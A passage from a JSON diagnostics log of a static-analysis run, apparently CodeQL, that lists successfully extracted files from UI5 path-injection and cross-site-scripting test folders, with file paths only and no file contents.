"index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 224 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 225 - } - } - } ], - "message" : { - "text" : "" 
- }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 226 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 227 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 228 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 229 - } - 
} - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 230 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 231 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 232 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 233 
- } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 234 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 235 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 236 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/.eslintrc.json", - "uriBaseId" : "%SRCROOT%", - "index" : 237 - 
} - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 238 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 239 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 240 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", 
- "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/Component.js", - "uriBaseId" : "%SRCROOT%", - "index" : 241 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controller/App.Controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 242 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controls/Book.js", - "uriBaseId" : "%SRCROOT%", - "index" : 243 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 244 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" 
: "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 245 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/model/todoitems.json", - "uriBaseId" : "%SRCROOT%", - "index" : 246 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/AllJourneys.js", - "uriBaseId" : "%SRCROOT%", - "index" : 247 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/FilterJourney.js", - "uriBaseId" : "%SRCROOT%", - "index" : 248 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - 
"id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/SearchJourney.js", - "uriBaseId" : "%SRCROOT%", - "index" : 249 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/TodoListJourney.js", - "uriBaseId" : "%SRCROOT%", - "index" : 250 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/arrangements/Startup.js", - "uriBaseId" : "%SRCROOT%", - "index" : 251 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/opaTests.qunit.html", - "uriBaseId" : "%SRCROOT%", - "index" : 252 - } - } - } ], - "message" : { - 
"text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/opaTests.qunit.js", - "uriBaseId" : "%SRCROOT%", - "index" : 253 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/pages/App.js", - "uriBaseId" : "%SRCROOT%", - "index" : 254 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/testsuite.qunit.html", - "uriBaseId" : "%SRCROOT%", - "index" : 255 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/testsuite.qunit.js", - "uriBaseId" : "%SRCROOT%", - "index" : 256 - } - } - } 
], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/AllTests.js", - "uriBaseId" : "%SRCROOT%", - "index" : 257 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/controller/App.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 258 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/unitTests.qunit.html", - "uriBaseId" : "%SRCROOT%", - "index" : 259 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/unitTests.qunit.js", - "uriBaseId" : "%SRCROOT%", - 
"index" : 260 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/util/Helper.js", - "uriBaseId" : "%SRCROOT%", - "index" : 261 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/view/App.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 262 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 263 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 264 - } - } - } ], - 
"message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 265 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 266 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 267 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 268 - } - } - } ], - "message" 
: { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 269 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 270 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 271 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 272 - } - } - } ], - "message" : { - "text" : 
"" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 273 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 274 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 275 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 276 - } - } - } ], - "message" : { - "text" : "" - }, - 
"level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 277 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 278 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 279 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 280 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : 
"none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 281 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 282 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 283 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 284 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : 
